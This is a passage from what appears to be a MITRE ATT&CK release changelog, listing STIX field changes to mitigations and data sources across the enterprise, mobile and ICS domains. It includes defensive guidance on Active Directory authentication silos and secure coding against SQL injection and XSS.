- Implementation: Configure Authentication Silos in AD, using group policies to create access zones with restrictions based on membership, such as the Protected Users security group. This restricts access to critical accounts and minimizes exposure to potential threats.
- Use Case: Place high-risk or high-value accounts, such as executive or administrative accounts, in an Authentication Silo with extra controls, limiting their exposure to only necessary systems. This reduces the risk of credential misuse or abuse if these accounts are compromised.
**Tools for Implementation**:
- Active Directory Group Policies: Use Group Policy Management Console (GPMC) to configure, deploy, and enforce policies across AD environments.
- PowerShell: Automate account configuration, logon restrictions, and policy application using PowerShell scripts.
- AD Administrative Center: Manage Authentication Silos and configure high-level policies for critical user groups within AD. |
mobile-attack
Minor Version Changes
[M1013] Application Developer Guidance
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-27 20:18:19.004000+00:00 | 2024-12-10 16:07:50.023000+00:00 |
description | This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of. | Application Developer Guidance focuses on providing developers with the knowledge, tools, and best practices needed to write secure code, reduce vulnerabilities, and implement secure design principles. By integrating security throughout the software development lifecycle (SDLC), this mitigation aims to prevent the introduction of exploitable weaknesses in applications, systems, and APIs. This mitigation can be implemented through the following measures:
Preventing SQL Injection (Secure Coding Practice):
- Implementation: Train developers to use parameterized queries or prepared statements instead of directly embedding user input into SQL queries.
- Use Case: A web application accepts user input to search a database. By sanitizing and validating user inputs, developers can prevent attackers from injecting malicious SQL commands.
Cross-Site Scripting (XSS) Mitigation:
- Implementation: Require developers to implement output encoding for all user-generated content displayed on a web page.
- Use Case: An e-commerce site allows users to leave product reviews. Properly encoding and escaping user inputs prevents malicious scripts from being executed in other users’ browsers.
Secure API Design:
- Implementation: Train developers to authenticate all API endpoints and avoid exposing sensitive information in API responses.
- Use Case: A mobile banking application uses APIs for account management. By enforcing token-based authentication for every API call, developers reduce the risk of unauthorized access.
Static Code Analysis in the Build Pipeline:
- Implementation: Incorporate tools into CI/CD pipelines to automatically scan for vulnerabilities during the build process.
- Use Case: A fintech company integrates static analysis tools to detect hardcoded credentials in their source code before deployment.
Threat Modeling in the Design Phase:
- Implementation: Use frameworks like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) to assess threats during application design.
- Use Case: Before launching a customer portal, a SaaS company identifies potential abuse cases, such as session hijacking, and designs mitigations like secure session management.
**Tools for Implementation**:
- Static Code Analysis Tools: Use tools that can scan for known vulnerabilities in source code.
- Dynamic Application Security Testing (DAST): Use tools like Burp Suite or OWASP ZAP to simulate runtime attacks and identify vulnerabilities.
- Secure Frameworks: Recommend secure-by-default frameworks (e.g., Django for Python, Spring Security for Java) that enforce security best practices. |
x_mitre_version | 1.1 | 1.2 |
Patches
[M1058] Antivirus/Antimalware
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-21 19:36:08.280000+00:00 | 2025-04-16 21:22:18.330000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M1002] Attestation
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-10-18 14:52:53.019000+00:00 | 2025-04-16 21:22:19.448000+00:00 |
[M1010] Deploy Compromised Device Detection Method
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:19.136000+00:00 |
[M1009] Encrypt Network Traffic
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:18.668000+00:00 |
[M1012] Enterprise Policy
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-24 15:08:18.395000+00:00 | 2025-04-16 21:22:18.032000+00:00 |
[M1014] Interconnection Filtering
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-08-15 15:06:03.428000+00:00 | 2025-04-16 21:22:19.290000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M1003] Lock Bootloader
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:18.821000+00:00 |
[M1001] Security Updates
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-10-18 14:56:15.631000+00:00 | 2025-04-16 21:22:18.982000+00:00 |
[M1004] System Partition Integrity
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:18.484000+00:00 |
[M1006] Use Recent OS Version
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 21:22:17.864000+00:00 |
[M1011] User Guidance
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-10-18 15:51:48.318000+00:00 | 2025-04-16 21:22:18.181000+00:00 |
ics-attack
Patches
[M0801] Access Management
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:30:56.250000+00:00 | 2025-03-12 16:11:54.933000+00:00 |
description | Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010) | Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provide sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0936] Account Use Policies
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:31:48.809000+00:00 | 2025-04-16 21:26:29.323000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0915] Active Directory Configuration
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:26.911000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0949] Antivirus/Antimalware
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:32:18.375000+00:00 | 2025-04-16 21:26:34.009000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0913] Application Developer Guidance
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:32:48.390000+00:00 | 2025-04-16 21:26:29.489000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0948] Application Isolation and Sandboxing
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:33:26.200000+00:00 | 2025-04-16 21:26:25.920000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0947] Audit
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:34:08.571000+00:00 | 2025-04-16 21:26:31.848000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0946] Boot Integrity
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:38:22.681000+00:00 | 2025-04-16 21:26:29.725000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0945] Code Signing
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:39:41.056000+00:00 | 2025-04-16 21:26:28.975000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0802] Communication Authenticity
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:40:49.135000+00:00 | 2025-04-16 21:26:32.013000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0953] Data Backup
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:41:39.667000+00:00 | 2025-04-16 21:26:31.496000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0803] Data Loss Prevention
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 20:55:14.442000+00:00 | 2025-04-16 21:26:27.444000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0942] Disable or Remove Feature or Program
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:42:11.231000+00:00 | 2025-04-16 21:26:32.177000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0808] Encrypt Network Traffic
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:42:52.198000+00:00 | 2025-04-16 21:26:29.147000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0941] Encrypt Sensitive Information
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:43:17.085000+00:00 | 2025-04-16 21:26:31.005000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0938] Execution Prevention
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:43:44.551000+00:00 | 2025-04-16 21:26:28.155000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0950] Exploit Protection
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:44:04.416000+00:00 | 2025-04-16 21:26:27.827000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0937] Filter Network Traffic
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:44:59.425000+00:00 | 2025-04-16 21:26:26.074000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0935] Limit Access to Resource Over Network
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:48:00.950000+00:00 | 2025-04-16 21:26:27.991000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0934] Limit Hardware Installation
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:48:22.980000+00:00 | 2025-04-16 21:26:30.822000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0805] Mechanical Protection Layers
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:29.910000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0806] Minimize Wireless Signal Propagation
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:48:44.925000+00:00 | 2025-04-16 21:26:34.172000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0816] Mitigation Limited or Not Effective
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:27.652000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0932] Multi-factor Authentication
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:49:12.466000+00:00 | 2025-04-16 21:26:32.907000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0807] Network Allowlists
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:49:34.958000+00:00 | 2025-04-16 21:26:31.149000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0931] Network Intrusion Prevention
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:49:53.366000+00:00 | 2025-04-16 21:26:27.092000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0930] Network Segmentation
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:50:12.354000+00:00 | 2025-04-16 21:26:26.551000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0928] Operating System Configuration
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:50:30.709000+00:00 | 2025-04-16 21:26:30.648000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0809] Operational Information Confidentiality
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 20:55:15.415000+00:00 | 2025-04-16 21:26:30.453000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0810] Out-of-Band Communications Channel
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:50:55.129000+00:00 | 2025-04-16 21:26:31.696000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0927] Password Policies
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:51:14.526000+00:00 | 2025-04-16 21:26:28.470000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0926] Privileged Account Management
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:51:40.366000+00:00 | 2025-04-16 21:26:28.652000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0811] Redundancy of Service
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-19 21:52:11.728000+00:00 | 2025-04-16 21:26:33.475000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0922] Restrict File and Directory Permissions
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:10:12.604000+00:00 | 2025-04-16 21:26:33.651000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0944] Restrict Library Loading
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:10:52.949000+00:00 | 2025-04-16 21:26:26.729000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0924] Restrict Registry Permissions
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:11:12.773000+00:00 | 2025-04-16 21:26:27.274000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0921] Restrict Web-Based Content
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:11:35.668000+00:00 | 2025-04-16 21:26:26.226000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0920] SSL/TLS Inspection
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:28.819000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0812] Safety Instrumented Systems
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:32.513000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0954] Software Configuration
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:12:04.727000+00:00 | 2025-04-16 21:26:33.833000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0814] Static Network Configuration
Current version: 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:12:51.139000+00:00 | 2025-04-16 21:26:28.312000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0817] Supply Chain Management
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:13:12.169000+00:00 | 2025-04-16 21:26:31.301000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0919] Threat Intelligence Program
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-24 15:09:07.609000+00:00 | 2025-04-16 21:26:32.342000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[M0951] Update Software
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:13:41.305000+00:00 | 2025-04-16 21:26:30.090000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0918] User Account Management
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:14:10.061000+00:00 | 2025-04-16 21:26:33.298000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0917] User Training
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:14:30.311000+00:00 | 2025-04-16 21:26:32.717000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0818] Validate Program Inputs
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:14:57.819000+00:00 | 2025-04-16 21:26:26.390000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0916] Vulnerability Scanning
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-20 13:15:23.350000+00:00 | 2025-04-16 21:26:33.110000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[M0815] Watchdog Timers
Current version: 1.0
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 20:55:16.383000+00:00 | 2025-04-16 21:26:30.248000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Data Sources
enterprise-attack
Minor Version Changes
[DS0015] Application Log
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:10.207Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[DS0017] Command
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-20T18:38:00.625Z | 2025-04-18T15:11:26.880Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_platforms[2] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0022] File
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-12-07T19:35:34.863Z | 2025-04-18T15:10:04.845Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_platforms[1] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0018] Firewall
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:12.372Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[DS0028] Logon Session
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:12:19.778Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0029] Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-20T18:38:13.356Z | 2025-04-18T15:11:13.424Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0009] Process
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-04-20T18:38:26.515Z | 2025-04-18T15:10:24.655Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0003] Scheduled Job
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-30T14:26:51.806Z | 2025-04-18T15:11:33.637Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0012] Script
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-12-07T19:50:56.964Z | 2025-04-18T15:12:42.967Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0019] Service
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-30T14:26:51.807Z | 2025-04-18T15:10:47.833Z |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
[DS0002] User Account
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-18T15:09:38.667Z |
x_mitre_version | 1.1 | 1.2 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_platforms | | ESXi |
x_mitre_domains | | ics-attack |
Patches
[DS0026] Active Directory
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:09.450Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0037] Certificate
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-16T20:39:10.496Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0025] Cloud Service
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_deprecated | | False |
revoked | | False |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2024-11-17T19:41:14.066Z |
external_references[2]['description'] | Microsoft. (n.d.). Azure products. Retrieved October 13, 2021. | Microsoft. (n.d.). Azure products. Retrieved November 17, 2024. |
external_references[2]['url'] | https://azure.microsoft.com/en-us/services/ | https://azure.microsoft.com/en-us/products/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0010] Cloud Storage
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_deprecated | | False |
revoked | | False |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-11-10T09:30:48.694Z | 2024-11-17T19:42:50.489Z |
external_references[2]['description'] | Microsoft. (n.d.). Azure Blob Storage. Retrieved October 13, 2021. | Microsoft. (n.d.). Azure Blob Storage. Retrieved November 17, 2024. |
external_references[2]['url'] | https://azure.microsoft.com/en-us/services/storage/blobs/ | https://azure.microsoft.com/en-us/products/storage/blobs/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0032] Container
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_deprecated | | False |
revoked | | False |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-11-10T09:30:48.694Z | 2024-12-24T18:06:47.351Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0038] Domain Name
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-16T20:39:11.900Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0016] Drive
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.804Z | 2025-04-18T15:12:29.888Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0027] Driver
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.805Z | 2025-04-16T20:39:09.930Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0001] Firmware
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-03-30T14:26:51.805Z | 2025-04-18T15:12:49.401Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
iterable_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_domains | | ics-attack |
[DS0036] Group
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2024-10-14T22:11:30.271Z | 2025-04-16T20:39:10.972Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0007] Image
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-11-10T09:30:48.696Z | 2025-04-16T20:39:11.122Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0030] Instance
Current version: 1.0
Details
dictionary_item_added
STIX Field | Old value | New value |
---|---|---|
x_mitre_deprecated | | False |
revoked | | False |
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2024-11-17T19:40:29.066Z |
external_references[1]['description'] | Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved October 13, 2021. | Microsoft. (n.d.). What is a virtual machine (VM)?. Retrieved November 17, 2024. |
external_references[1]['url'] | https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/ | https://azure.microsoft.com/en-us/resources/cloud-computing-dictionary/what-is-a-virtual-machine/ |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0035] Internet Scan
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-16T20:39:08.675Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0008] Kernel
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2021-11-10T09:30:48.696Z | 2025-04-16T20:39:12.054Z |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[DS0004] Malware Repository
Current version: 1.1
Details
values_changed
STIX Field | Old value | New value |
---|---|---|
modified | 2022-12-07T19:49:46.256Z | 2025-04-16T20:39:11.272Z |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[DS0011] Module
Current version: 1.0
Details
values_changed
STIX Field | Old value | New value |
